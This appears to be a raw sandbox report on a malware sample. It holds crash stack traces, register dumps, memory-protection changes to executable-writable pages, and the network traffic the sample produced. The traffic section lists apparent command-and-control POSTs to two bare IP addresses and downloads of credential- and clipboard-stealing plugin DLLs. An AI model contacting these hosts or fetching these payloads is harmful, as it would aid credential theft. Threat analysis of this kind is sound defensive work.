0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335788
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335796
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 46071056
1 0 0

__exception__

stacktrace:
0x843e17d
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335552
registers.edi: 3335800
registers.eax: 0
registers.ebp: 3335812
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843e432
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335788
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335796
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 47568092
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3336672
registers.edi: 3336952
registers.eax: 0
registers.ebp: 3336680
registers.edx: 0
registers.ebx: 3338428
registers.esi: 48107932
registers.ecx: 48115016
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7ac278
registers.esp: 3009428
registers.edi: 3009480
registers.eax: 0
registers.ebp: 3009492
registers.edx: 5134288
registers.ebx: 3010700
registers.esi: 44390424
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007780
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008016
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 45959968
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007780
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008016
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 47391840
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007780
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008016
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 44968592
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007740
registers.edi: 3007988
registers.eax: 0
registers.ebp: 3008000
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3007976
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3007984
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 46536292
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007740
registers.edi: 3007988
registers.eax: 0
registers.ebp: 3008000
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3007976
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3007984
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 48140232
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007740
registers.edi: 3007988
registers.eax: 0
registers.ebp: 3008000
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3007976
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3007984
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 49491532
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007804
registers.edi: 3008052
registers.eax: 0
registers.ebp: 3008064
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008040
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008048
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 44597592
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007804
registers.edi: 3008052
registers.eax: 0
registers.ebp: 3008064
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008040
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008048
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 46092248
1 0 0

__exception__

stacktrace:

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007804
registers.edi: 3008052
registers.eax: 0
registers.ebp: 3008064
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008040
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008048
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 47586904
1 0 0

__exception__

stacktrace:
0x4fb4d6d
0x4fb4c48
0x7af105
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007824
registers.edi: 3008072
registers.eax: 0
registers.ebp: 3008084
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4fb35d0
0x4fb5022
0x4fb4c48
0x7af105
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008060
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008068
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 44623304
1 0 0

__exception__

stacktrace:
0x4fb4d6d
0x4fb4c48
0x7af11d
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007824
registers.edi: 3008072
registers.eax: 0
registers.ebp: 3008084
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4fb35d0
0x4fb5022
0x4fb4c48
0x7af11d
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008060
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008068
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 46120340
1 0 0

__exception__

stacktrace:
0x4fb4d6d
0x4fb4c48
0x7af11d
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007824
registers.edi: 3008072
registers.eax: 0
registers.ebp: 3008084
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://193.233.255.73/loghub/master
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.124.1/theme/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.1/theme/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.1/theme/Plugins/clip64.dll
request POST http://193.233.255.73/loghub/master
request POST http://77.91.124.1/theme/index.php
request GET http://77.91.124.1/theme/Plugins/cred64.dll
request GET http://77.91.124.1/theme/Plugins/clip64.dll
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://www.youtube.com/
request GET https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F
request GET https://fonts.googleapis.com/css?family=YouTube+Sans:500
request GET https://fonts.googleapis.com/css?family=Roboto:400,500
request GET https://www.youtube.com/img/desktop/supported_browsers/yt_logo_rgb_light.png
request GET https://www.youtube.com/img/desktop/supported_browsers/dinosaur.png
request GET https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxM.woff
request GET https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc-.woff
request GET https://accounts.google.com/
request GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywD2xgLxszRIN_7MaKSoUaoYTMvRFg50b2S5b8UluthbcUsGRE-8e1g-xdevGcqP20z4uow
request GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeywTlS8RSTMSloorftkjj1lY_2tWmEzy5429BwqOoerpQlAzoTk3QhoMS2hENHZmnLEtBloUjQ&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1023002296%3A1698047601366063
request GET https://www.youtube.com/img/desktop/supported_browsers/chrome.png
request GET https://www.youtube.com/img/desktop/supported_browsers/edgium.png
request GET https://fonts.gstatic.com/s/youtubesans/v19/Qw3hZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3HMXfxQASluL2m_dANVawBpSF.woff
request GET https://www.youtube.com/img/desktop/supported_browsers/opera.png
request GET https://www.youtube.com/img/desktop/supported_browsers/firefox.png
request GET https://www.youtube.com/favicon.ico
request GET https://accounts.google.com/_/bscframe
request GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request GET https://accounts.google.com/favicon.ico
request GET https://accounts.google.com/generate_204?S178ZQ
request GET https://www.google.com/favicon.ico
request POST http://193.233.255.73/loghub/master
request POST http://77.91.124.1/theme/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

